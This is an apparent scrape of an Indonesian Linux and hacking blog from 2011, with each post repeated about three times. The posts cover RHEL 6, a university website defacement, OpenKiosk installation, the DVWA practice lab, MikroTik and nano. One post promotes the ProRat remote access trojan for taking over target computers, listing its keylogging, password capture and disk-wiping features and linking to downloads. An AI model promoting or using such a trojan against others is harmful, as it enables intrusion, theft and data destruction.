Friday 28 January 2011

Rilis Final Red Hat Enterprise Linux 6 - RHEL 6

http://bojalinuxer.blogspot.com

RHEL6 - Red Hat.Inc, penyedia solusi open source terkemuka didunia, dengan bangga mengumumkan ketersediaan rilis final Red Hat Enterprise Linux 6. Rilis ini adalah rilis yang dinanti-nantikan dari RHEL 6 yang memuat perbaikan-perbaikan dan itu tersedia untuk arsitektur i386, AMD64/Intel64, System z, dan IBM Power (64-bit).

Namun, Red Hat mengumumkan bahwa rilis ini tidak akan memberikan dukungan bagi arsitektur Intel Itanium. Selain itu, prosesor POWER5 tidak lagi didukung, hanya CPU POWER6 atau yang lebih tinggi yang akan mendapat dukungan.

"Red Hat Enterprise Linux selama bertahun-tahun menjadi platform mission-critical pilihan bagi banyak perusahaan. Pelanggan seperti British Airways, Citi dan NTT Communications telah menjadi mitra terpercaya dalam pengembangan platform Red Hat Enterprise Linux."

"Kami sekarang memasuki era enterprise computing di mana fleksibilitas, portabilitas dan interoperabilitas yang lebih penting daripada sebelumnya. Dan hari ini, kami memberikan platform yang dibutuhkan konsumen. Ini selalu menjadi fokus kami".

"Apa yang kami berikan lebih terbuka, lebih dapat diandalkan dan lebih komprehensif daripada produk lain di pasaran. Dimasa mendatang,ini adalah platform yang dirancang untuk menghantar pelanggan ke generasi berikutnya dengan virtualisasi dan cloud". - Kata Paul Cormier, executive vice president and president, Products and Technologies di Red Hat, pada press release.

http://bojalinuxer.blogspot.com

Yang baru dengan Red Hat Enterprise Linux 6:

  • Peningkatan grafis installer;
  • Dukungan untuk file sistem baru (EXT4, XFS, NFS, block discard);
  • LVM enhancements;
  • Power management yang lebih baik dengan powertop dan tuned;
  • Peningkatan PackageKit dan Yum package managers;
  • Dukungan yang lebih baik untuk clustering, dengan Corosync Cluster Engine;
  • Peningkatan keamanan;
  • Pelabelan Network packet dan dukungan untuk IPv6;
  • Fungsionalitas Suspend dan resume;
  • Dukungan untuk multiple display;
  • Driver video Nouveau untuk kartu grafis Nvidia;
  • Dukunga Internasionalisasi;
  • KDE SC 4.3;
  • OpenOffice.org Office Suite 3.1;
  • Mozilla Thunderbird 3;
  • Mozilla Firefox 3.5;
  • Apache 2.2.15;
  • MySQL 5.1;
  • PostgreSQL 8.4;
  • Dokumentasi yang lebih baik;
  • Peningkatan dukungan C++;
  • Peningkatan Samba;
  • Dukungan penuh untuk KVM (Kernel-based Virtual Machine);
  • Dukungan Alternative PHP Cache (APC) untuk PHP;
  • Penambahan memcached.

Bagai manapun distribusi Red Hat Enterprise Linux (RHEL) lebih ditargetkan ke pasar komersial, termasuk mainframe, yang menikmati dukungan teknis selama 7 tahun atas Red Hat setelah perilisan. Versi baru RHEL dilepaskan cukup cepat dan dengan demikian, pengguna dapat meng-upgrade versi yang sedang digunakan ke rilis terbaru secara gratis. Red Hat didistribusikan menjadi empat versi RHEL: RHEL AS (Advanced Server), RHEL ES (edge, ekonomi atau server entry-level), RHEL WS (workstation) dan Red Hat Desktop.

Bagi Anda yang berminat mencoba, dapat men-download RHEL 6 beta 2 di sini.

Red Hat Enterprise Linux 5.5 (Registration Required)
[iso] [0 KB]

Red Hat Enterprise Linux 6 Beta 2 (ISO) i386
[iso] [3.40 GB]

Red Hat Enterprise Linux 6 Beta 2 (ISO) x86_64
[iso] [3.90 GB]

Rilis Final Red Hat Enterprise Linux 6 - RHEL 6

http://bojalinuxer.blogspot.com
RHEL6 - Red Hat.Inc, penyedia solusi open source terkemuka didunia, dengan bangga mengumumkan ketersediaan rilis final Red Hat Enterprise Linux 6. Rilis ini adalah rilis yang dinanti-nantikan dari RHEL 6 yang memuat perbaikan-perbaikan dan itu tersedia untuk arsitektur i386, AMD64/Intel64, System z, dan IBM Power (64-bit).
Namun, Red Hat mengumumkan bahwa rilis ini tidak akan memberikan dukungan bagi arsitektur Intel Itanium. Selain itu, prosesor POWER5 tidak lagi didukung, hanya CPU POWER6 atau yang lebih tinggi yang akan mendapat dukungan.
"Red Hat Enterprise Linux selama bertahun-tahun menjadi platform mission-critical pilihan bagi banyak perusahaan. Pelanggan seperti British Airways, Citi dan NTT Communications telah menjadi mitra terpercaya dalam pengembangan platform Red Hat Enterprise Linux."
"Kami sekarang memasuki era enterprise computing di mana fleksibilitas, portabilitas dan interoperabilitas yang lebih penting daripada sebelumnya. Dan hari ini, kami memberikan platform yang dibutuhkan konsumen. Ini selalu menjadi fokus kami".
"Apa yang kami berikan lebih terbuka, lebih dapat diandalkan dan lebih komprehensif daripada produk lain di pasaran. Dimasa mendatang,ini adalah platform yang dirancang untuk menghantar pelanggan ke generasi berikutnya dengan virtualisasi dan cloud". - Kata Paul Cormier, executive vice president and president, Products and Technologies di Red Hat, pada press release.
http://bojalinuxer.blogspot.com
Yang baru dengan Red Hat Enterprise Linux 6:
  • Peningkatan grafis installer;
  • Dukungan untuk file sistem baru (EXT4, XFS, NFS, block discard);
  • LVM enhancements;
  • Power management yang lebih baik dengan powertop dan tuned;
  • Peningkatan PackageKit dan Yum package managers;
  • Dukungan yang lebih baik untuk clustering, dengan Corosync Cluster Engine;
  • Peningkatan keamanan;
  • Pelabelan Network packet dan dukungan untuk IPv6;
  • Fungsionalitas Suspend dan resume;
  • Dukungan untuk multiple display;
  • Driver video Nouveau untuk kartu grafis Nvidia;
  • Dukunga Internasionalisasi;
  • KDE SC 4.3;
  • OpenOffice.org Office Suite 3.1;
  • Mozilla Thunderbird 3;
  • Mozilla Firefox 3.5;
  • Apache 2.2.15;
  • MySQL 5.1;
  • PostgreSQL 8.4;
  • Dokumentasi yang lebih baik;
  • Peningkatan dukungan C++;
  • Peningkatan Samba;
  • Dukungan penuh untuk KVM (Kernel-based Virtual Machine);
  • Dukungan Alternative PHP Cache (APC) untuk PHP;
  • Penambahan memcached.
Bagai manapun distribusi Red Hat Enterprise Linux (RHEL) lebih ditargetkan ke pasar komersial, termasuk mainframe, yang menikmati dukungan teknis selama 7 tahun atas Red Hat setelah perilisan. Versi baru RHEL dilepaskan cukup cepat dan dengan demikian, pengguna dapat meng-upgrade versi yang sedang digunakan ke rilis terbaru secara gratis. Red Hat didistribusikan menjadi empat versi RHEL: RHEL AS (Advanced Server), RHEL ES (edge, ekonomi atau server entry-level), RHEL WS (workstation) dan Red Hat Desktop.
Bagi Anda yang berminat mencoba, dapat men-download RHEL 6 beta 2 di sini.

Rilis Final Red Hat Enterprise Linux 6 - RHEL 6

http://bojalinuxer.blogspot.com

RHEL6 - Red Hat.Inc, penyedia solusi open source terkemuka didunia, dengan bangga mengumumkan ketersediaan rilis final Red Hat Enterprise Linux 6. Rilis ini adalah rilis yang dinanti-nantikan dari RHEL 6 yang memuat perbaikan-perbaikan dan itu tersedia untuk arsitektur i386, AMD64/Intel64, System z, dan IBM Power (64-bit).

Namun, Red Hat mengumumkan bahwa rilis ini tidak akan memberikan dukungan bagi arsitektur Intel Itanium. Selain itu, prosesor POWER5 tidak lagi didukung, hanya CPU POWER6 atau yang lebih tinggi yang akan mendapat dukungan.

"Red Hat Enterprise Linux selama bertahun-tahun menjadi platform mission-critical pilihan bagi banyak perusahaan. Pelanggan seperti British Airways, Citi dan NTT Communications telah menjadi mitra terpercaya dalam pengembangan platform Red Hat Enterprise Linux."

"Kami sekarang memasuki era enterprise computing di mana fleksibilitas, portabilitas dan interoperabilitas yang lebih penting daripada sebelumnya. Dan hari ini, kami memberikan platform yang dibutuhkan konsumen. Ini selalu menjadi fokus kami".

"Apa yang kami berikan lebih terbuka, lebih dapat diandalkan dan lebih komprehensif daripada produk lain di pasaran. Dimasa mendatang,ini adalah platform yang dirancang untuk menghantar pelanggan ke generasi berikutnya dengan virtualisasi dan cloud". - Kata Paul Cormier, executive vice president and president, Products and Technologies di Red Hat, pada press release.

http://bojalinuxer.blogspot.com

Yang baru dengan Red Hat Enterprise Linux 6:

  • Peningkatan grafis installer;
  • Dukungan untuk file sistem baru (EXT4, XFS, NFS, block discard);
  • LVM enhancements;
  • Power management yang lebih baik dengan powertop dan tuned;
  • Peningkatan PackageKit dan Yum package managers;
  • Dukungan yang lebih baik untuk clustering, dengan Corosync Cluster Engine;
  • Peningkatan keamanan;
  • Pelabelan Network packet dan dukungan untuk IPv6;
  • Fungsionalitas Suspend dan resume;
  • Dukungan untuk multiple display;
  • Driver video Nouveau untuk kartu grafis Nvidia;
  • Dukunga Internasionalisasi;
  • KDE SC 4.3;
  • OpenOffice.org Office Suite 3.1;
  • Mozilla Thunderbird 3;
  • Mozilla Firefox 3.5;
  • Apache 2.2.15;
  • MySQL 5.1;
  • PostgreSQL 8.4;
  • Dokumentasi yang lebih baik;
  • Peningkatan dukungan C++;
  • Peningkatan Samba;
  • Dukungan penuh untuk KVM (Kernel-based Virtual Machine);
  • Dukungan Alternative PHP Cache (APC) untuk PHP;
  • Penambahan memcached.

Bagai manapun distribusi Red Hat Enterprise Linux (RHEL) lebih ditargetkan ke pasar komersial, termasuk mainframe, yang menikmati dukungan teknis selama 7 tahun atas Red Hat setelah perilisan. Versi baru RHEL dilepaskan cukup cepat dan dengan demikian, pengguna dapat meng-upgrade versi yang sedang digunakan ke rilis terbaru secara gratis. Red Hat didistribusikan menjadi empat versi RHEL: RHEL AS (Advanced Server), RHEL ES (edge, ekonomi atau server entry-level), RHEL WS (workstation) dan Red Hat Desktop.

Bagi Anda yang berminat mencoba, dapat men-download RHEL 6 beta 2 di sini.

Red Hat Enterprise Linux 5.5 (Registration Required)
[iso] [0 KB]

Red Hat Enterprise Linux 6 Beta 2 (ISO) i386
[iso] [3.40 GB]

Red Hat Enterprise Linux 6 Beta 2 (ISO) x86_64
[iso] [3.90 GB]

Situs IPB Mudah Dijebol Hacker

Screenshot web page situs IPB yang di-hack
JAKARTA - Seorang hacker mengaku bisa menjebol pertahanan di situs resmi Institut Pertanian Bogor (IPB).
Dalam aksinya, sang hacker mengaku tidak berniat untuk mengacak-acak situs tersebut. Hanya saja mereka ingin mengungkapkan jika keamanan jaringan sebuah situs sangatlah penting. Apalagi saat ini diduga telah terjadi perang cyber antara hacker Indonesia dengan Malaysia.

"Ada beberapa backdoor yang tertanam di situs ipb.ac.id. Itu tugas admin untuk membersihkan dan mem-patch celah yang berpotensi disusupi hacker," tulis sang hacker dalam pesannya, Jumat (31/12/2010).

Memang sang hacker tidak mengacak-acak situs secara keseluruhan. Buktinya konten-konten dalam situs IPB masih bisa diakses. Hanya saja sang hacker bisa menerobos keamanan situs dan menambahkan konten baru ke dalam situs tersebut.

Bahkan dalam satu halaman yang dibuat hacker sebagai bukti kemampuannya, yaitu dalam halaman webometrics.ipb.ac.id, dirinya menyematkan sebuah foto yang menggambarkan nasionalisme anak Indonesia.
Note: sampai saat ini defacing page masih ada, silahkan di cek di
http://webometrics.ipb.ac.id/cms/

Situs IPB Mudah Dijebol Hacker

Screenshot web page situs IPB yang di-hack
JAKARTA - Seorang hacker mengaku bisa menjebol pertahanan di situs resmi Institut Pertanian Bogor (IPB).
Dalam aksinya, sang hacker mengaku tidak berniat untuk mengacak-acak situs tersebut. Hanya saja mereka ingin mengungkapkan jika keamanan jaringan sebuah situs sangatlah penting. Apalagi saat ini diduga telah terjadi perang cyber antara hacker Indonesia dengan Malaysia.

"Ada beberapa backdoor yang tertanam di situs ipb.ac.id. Itu tugas admin untuk membersihkan dan mem-patch celah yang berpotensi disusupi hacker," tulis sang hacker dalam pesannya, Jumat (31/12/2010).

Memang sang hacker tidak mengacak-acak situs secara keseluruhan. Buktinya konten-konten dalam situs IPB masih bisa diakses. Hanya saja sang hacker bisa menerobos keamanan situs dan menambahkan konten baru ke dalam situs tersebut.

Bahkan dalam satu halaman yang dibuat hacker sebagai bukti kemampuannya, yaitu dalam halaman webometrics.ipb.ac.id, dirinya menyematkan sebuah foto yang menggambarkan nasionalisme anak Indonesia.
Note: sampai saat ini defacing page masih ada, silahkan di cek di
http://webometrics.ipb.ac.id/cms/

Situs IPB Mudah Dijebol Hacker

Screenshot web page situs IPB yang di-hack
JAKARTA - Seorang hacker mengaku bisa menjebol pertahanan di situs resmi Institut Pertanian Bogor (IPB).
Dalam aksinya, sang hacker mengaku tidak berniat untuk mengacak-acak situs tersebut. Hanya saja mereka ingin mengungkapkan jika keamanan jaringan sebuah situs sangatlah penting. Apalagi saat ini diduga telah terjadi perang cyber antara hacker Indonesia dengan Malaysia.

"Ada beberapa backdoor yang tertanam di situs ipb.ac.id. Itu tugas admin untuk membersihkan dan mem-patch celah yang berpotensi disusupi hacker," tulis sang hacker dalam pesannya, Jumat (31/12/2010).

Memang sang hacker tidak mengacak-acak situs secara keseluruhan. Buktinya konten-konten dalam situs IPB masih bisa diakses. Hanya saja sang hacker bisa menerobos keamanan situs dan menambahkan konten baru ke dalam situs tersebut.

Bahkan dalam satu halaman yang dibuat hacker sebagai bukti kemampuannya, yaitu dalam halaman webometrics.ipb.ac.id, dirinya menyematkan sebuah foto yang menggambarkan nasionalisme anak Indonesia.
Note: sampai saat ini defacing page masih ada, silahkan di cek di
http://webometrics.ipb.ac.id/cms/

Wednesday 19 January 2011

Installing Linux Billing

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d.Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

Installing Linux Billing

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d.Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

Installing Linux Billing

http://imanhermawan.files.wordpress.com/2008/08/screenshot-billclient.png

Here is information on how to install one of the billing program in Linux, namely OpenKiosk: http://openkiosk.sourceforge.net. This program can NOT be used in LTSP. One of the advantages is that the client / workstation can use the operating system Linux, FreeBSD / OpenBSD, and Windows. Billing program is also free.

Terms:
Client (which Linux) to use KDE (not Gnome)

How To Install
1. Create a special directory to collect all the programs needed, command2 type the following at the console / terminal:

mkdir / downloads
cd / downloads

2. Download the following programs into / downloads

a. Nodeview : for Server

b. kdex11client :

c. Client for Windows :

d.Qt: (for Server & Client)

e. BerkeleyDB (for Server & Client)


3. Install BerkeleyDB : (di SERVER & CLIENT)

cd /downloads
tar xzvf db-4.3.28.NC.tar.gz
cd db-4.3.28.NC
cd build_unix
../dist/configure
make
make install
cd ..
cd ..

4. Install Qt : (SERVER & CLIENT)

cd /downloads
bzip2 -d qt-x11-free-3.3.4.tar.bz2
tar xvf qt-x11-free-3.3.4.tar
cd qt-x11-free-3.3.4
./configure

Qt will ask whether you agree with the contents of his license, Enter type "yes" and press Enter

make
make install
cd ..

5. Install Nodeview (controller) (the SERVER)

cd /downloads
tar xzvf nodeview-0.8.3.tar.gz
cd nodeview-0.8.3
./configure
make
make install

Nodeview then be run by typing / usr / local / bin / nodeview


6. Install kdex11client (the CLIENT)

cd /downloads
tar xzvf kdex11client-0.3.1b.tar.gz
cd kdex11client-0.3.1b
./configure
make
make install

7. Run Nodeview

/usr/local/bin/nodeview

Nodeview will ask for login to the Administrator. Because we run it the first time, then we can type anything as the password.

8. Setup Nodeview

Select the Settings menu - Configuration.
Click the tab Workstation,
Click on SETUP,
Enter a workgroup name (free of course, eg cafe)
Click the ADD,
Click CLOSE,

Put the computers in your cafe:
In the "station name", enter the computer name (example: klien1, klien2, etc.)
In the "IP address", enter the IP address of this computers.

Then click on "ADD / EDIT" to add

Close everything, Nodeview will ask for the password for the Administrator, enter up to you. Then run it again Nodeview. Now OpenKiosk program is ready for your use.
Hopefully useful..

DVWA Web Hacking

Damn Vulnerable Web Application (DVWA) is a collection of web hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.

DVWA include some web hacking tools such as:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download DVWA

DVWA Web Hacking

Damn Vulnerable Web Application (DVWA) is a collection of web hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.

DVWA include some web hacking tools such as:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download DVWA

DVWA Web Hacking

Damn Vulnerable Web Application (DVWA) is a collection of web hacking tool based on PHP / mySQL. DVWA may be an option for beginners to learn web hacking web hacking techniques from scratch. Various techniques web hacking attacks can be obtained from this tool. Besides easy to use, lightweight and complete, DVWA run through a local server (localhost) using WAMP / XAMP / LAMP and others.

DVWA include some web hacking tools such as:

- SQL Injection
- XSS (Cross Site Scripting)
- LFI (Local File Inclusion)
- RFI (Remote File Inclusion)
- Command Execution
- Upload Script
- Login Brute Force

Download DVWA

Friday 14 January 2011

Remote Administrator with ProRat

Prorat is one of RAT (Remote Administration Tools) are widely used to take over the computer system. Tool made by PRO Group, a group of Turkish hackers community, can be used as a tool Hacking computers in a network. Use of Prorat quite simple, you simply enter the IP (Internet Protocol) is the target computer and then go through one open port. The hardest part is finding where an open port. But you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc..


Here are the features provided by PRORAT:

- Remote Control
- Viewing System Info, application running and the Task Manager
- Add process, file, or download files
- Admin FTP
- Format the HDD (hard disk damage)
- Remotely download
- Running MS-DOS, Batch Script, VBScript
- Adding a Registry Entry
- Keylogger: Password Recording
- Make Screnshoot, see your Windows desktop instantly
- Send messages and chat
- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls

Download Prorat
or Download Prorat at here

Remote Administrator with ProRat

Prorat is one of RAT (Remote Administration Tools) are widely used to take over the computer system. Tool made by PRO Group, a group of Turkish hackers community, can be used as a tool Hacking computers in a network. Use of Prorat quite simple, you simply enter the IP (Internet Protocol) is the target computer and then go through one open port. The hardest part is finding where an open port. But you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc..


Here are the features provided by PRORAT:

- Remote Control
- Viewing System Info, application running and the Task Manager
- Add process, file, or download files
- Admin FTP
- Format the HDD (hard disk damage)
- Remotely download
- Running MS-DOS, Batch Script, VBScript
- Adding a Registry Entry
- Keylogger: Password Recording
- Make Screnshoot, see your Windows desktop instantly
- Send messages and chat
- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls

Download Prorat
or Download Prorat at here

Remote Administrator with ProRat

Prorat is one of RAT (Remote Administration Tools) are widely used to take over the computer system. Tool made by PRO Group, a group of Turkish hackers community, can be used as a tool Hacking computers in a network. Use of Prorat quite simple, you simply enter the IP (Internet Protocol) is the target computer and then go through one open port. The hardest part is finding where an open port. But you can use a variety of network analysis tools such as nmap, Ethercap, LookHost, etc..


Here are the features provided by PRORAT:

- Remote Control
- Viewing System Info, application running and the Task Manager
- Add process, file, or download files
- Admin FTP
- Format the HDD (hard disk damage)
- Remotely download
- Running MS-DOS, Batch Script, VBScript
- Adding a Registry Entry
- Keylogger: Password Recording
- Make Screnshoot, see your Windows desktop instantly
- Send messages and chat
- Shutdown, Restart, Control Panel, IExplorer, Registry, Printer and Online Controls

Download Prorat
or Download Prorat at here

Tuesday 11 January 2011

Membangun Hotspot dengan MikroTik RouterOS

http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg

MikroTikRouterOS™ merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.

Fasilitaspada mikrotik antara lain sebagai berikut :

  • Protokoll routing RIP, OSPF, BGP.
  • Statefull firewall
  • Hotspot for Plug-and-Play access
  • remote winbox GUI admin
Tutorial lengkap hotspot MikroTik bisa di download disini

Membangun Hotspot dengan MikroTik RouterOS

http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg

MikroTikRouterOS� merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.

Fasilitaspada mikrotik antara lain sebagai berikut :

  • Protokoll routing RIP, OSPF, BGP.
  • Statefull firewall
  • Hotspot for Plug-and-Play access
  • remote winbox GUI admin
Tutorial lengkap hotspot MikroTik bisa di download disini

Membangun Hotspot dengan MikroTik RouterOS

http://www.invasaohacking.com/wp-content/uploads/2010/04/Mikrotik-Hotspot.jpeg

MikroTikRouterOS� merupakansistemoperasiLinuxbase yang diperuntukkan sebagai network router.Didesain untuk memberikan kemudahan bagi penggunanya. Administrasinyabisa dilakukan melalui Windowsapplication (WinBox). Selain itu instalasi dapat dilakukan padastandard computer PC. PC yang akan dijadikan router mikrotikpun tidakmemerlukan resource yang cukup besar untuk penggunaan standard,misalnya hanya sebagai gateway.Untuk keperluan beban yang besar ( network yang kompleks, routingyang rumit dll) disarankan untuk mempertimbangkan pemilihan resourcePC yang memadai.

Fasilitaspada mikrotik antara lain sebagai berikut :

  • Protokoll routing RIP, OSPF, BGP.
  • Statefull firewall
  • Hotspot for Plug-and-Play access
  • remote winbox GUI admin
Tutorial lengkap hotspot MikroTik bisa di download disini

Monday 10 January 2011

Perintah Dasar Teks Editor Nano

Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem Unix-like.

1. Tentang Nano

Nano merupakan sebuah aplikasi editor berbasis teks untuk Unix dan sistem Unix-like. Ini adalah tiruan dari Pico, editor dari klien email Pine. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.

Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera GNU General Public License (lisensi GPLv3).

2. Perintah Dasar Nano
  • -Membuka dan menciptakan sebuah file di nano

    # nano namafile

    contoh:

    # nano latihan

    Catatan:
    Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt

  • -Mengedit file di nano
  • # nano /etc/issue

  • -Simpan dan Keluar
  • Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).
    Keluar dari nano, tekan Ctrl+X.

  • -Cut dan Paste
  • cut sebuah baris, tekan Ctrl+K.
    paste, tekan Ctrl+U.

  • -Mencari Teks
  • Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.
    Tekan Alt+W, untuk mencari kembali string yang sama.

3. Penutup

Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.

Perintah Dasar Teks Editor Nano

Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem Unix-like.

1. Tentang Nano

Nano merupakan sebuah aplikasi editor berbasis teks untuk Unix dan sistem Unix-like. Ini adalah tiruan dari Pico, editor dari klien email Pine. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.

Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera GNU General Public License (lisensi GPLv3).

2. Perintah Dasar Nano
  • -Membuka dan menciptakan sebuah file di nano

    # nano namafile

    contoh:

    # nano latihan

    Catatan:
    Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt

  • -Mengedit file di nano
  • # nano /etc/issue

  • -Simpan dan Keluar
  • Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).
    Keluar dari nano, tekan Ctrl+X.

  • -Cut dan Paste
  • cut sebuah baris, tekan Ctrl+K.
    paste, tekan Ctrl+U.

  • -Mencari Teks
  • Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.
    Tekan Alt+W, untuk mencari kembali string yang sama.

3. Penutup

Dengan memahami operasi-operasi dasar pada nano tersebut, nantinya rekan-rekan tidak akan bingung lagi jika mengedit atau membuat sebuah file teks di dalam sebuah Command Line Interface.

Perintah Dasar Teks Editor Nano

Panduan ini dibuat untuk memberikan pemahaman menggunakan nano dalam membuat atau mengedit sebuah file dalam sistem Unix-like.

1. Tentang Nano

Nano merupakan sebuah aplikasi editor berbasis teks untuk Unix dan sistem Unix-like. Ini adalah tiruan dari Pico, editor dari klien email Pine. Tujuan nano dikembangkan adalah untuk meniru Pico sebaik mungkin dan mungkin mencakup fungsionalitas tambahan.

Nano merupakan perangkat lunak bebas yang dirilis di bawah bendera GNU General Public License (lisensi GPLv3).

2. Perintah Dasar Nano
  • -Membuka dan menciptakan sebuah file di nano

    # nano namafile

    contoh:

    # nano latihan

    Catatan:
    Anda juga dapat lansung memberikan format ekstensi pada file teks yang dibuat tersebut, seperti latihan.txt atau latihan.odt

  • -Mengedit file di nano
  • # nano /etc/issue

  • -Simpan dan Keluar
  • Menyimpan file, tekan Ctrl+O (tahan tombol Ctrl lalu tekan O).
    Keluar dari nano, tekan Ctrl+X.

  • -Cut dan Paste
  • cut sebuah baris, tekan Ctrl+K.
    paste, tekan Ctrl+U.

  • -Mencari Teks
  • Tekan Ctrl+W, ketikkan string yang ingin Anda cari, kemudian tekan Enter.
    Tekan Alt+W, untuk mencari kembali string yang sama.

3. Penutup

